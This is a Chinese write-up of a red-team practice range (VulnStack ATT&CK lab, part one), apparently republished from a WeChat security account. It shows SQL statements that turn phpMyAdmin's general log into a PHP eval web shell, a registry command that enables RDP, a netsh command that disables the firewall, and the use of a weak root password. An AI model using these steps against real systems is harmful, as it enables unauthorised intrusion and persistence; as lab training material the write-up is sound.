靶场的描述:
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。
拓扑图如下所示:
这里的攻击机使用的kali,web服务器用的是win7,域成员分别是windows2003、windows2008。
网络划分:
kali设置成NAT模式,win7网络适配器1设置成自定义(VMnet1仅主机模式),网络适配器2设置成NAT模式,win2003、win2008 网络适配器设置成自定义(VMnet1仅主机模式)
攻击机:kali ip:192.168.96.128 / 物理机 ip:192.168.96.1
win7 内网ip:192.168.52.143 外网ip:192.168.96.129
win2003 ip:192.168.52.141
win2008 ip:192.168.52.138
最后测试各个PC的连通性,如果kali ping win7不通不要紧,因为win7开了防火墙。
信息收集:
利用nmap扫描服务器外网ip,发现开放了80,3306等端口
直接访问ip,发现绝对路径服务器版本操作系统等信息暴露
利用工具扫描目录。发现了phpmyadmin和备份文件路径,可直接访问备份文件然后下载。
下载备份文件发现有一个cms,然后访问cms路径后,存在信息泄露直接进入网站后台。
漏洞探测:
(1)网页前端存在信息泄露,可直接进入后台
后台管理界面
(2)数据库系统存在弱口令
连接数据库,直接弱口令一波,用户名:root 密码:root
(3)留言板存在储存型xss漏洞
(4)后台管理存在任意文件改写
利用漏洞拿webshell
这里我利用phpMyAdmin开启全局日志getshell
首先查看general_log是否开启,执行下面SQL语句
show variables like '%general%';
发现没有打开,执行以下语句打开它,并且将存放日志内容改为c:/phpStudy/www/shell.php
set global general_log='on'
set global general_log_file='C:/phpStudy/www/shell.php'
往日志文件里写木马
select "<?php @eval($_POST['shell']);?>"
蚁剑连接成功拿到webshell
权限提升:
尝试连接远程桌面,但是3389端口没有打开,可以用命令强制打开
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭服务器防火墙
netsh firewall set opmode disable
添加新用户,注意密码要符合本地安全策略
利用创建的用户成功远程连接桌面
备注:
目前只完成了一半,内网渗透请关注下期。
靶场下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
原文始发于微信公众号(小雪花安全团队):ATT&CK红队评估实战靶场(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论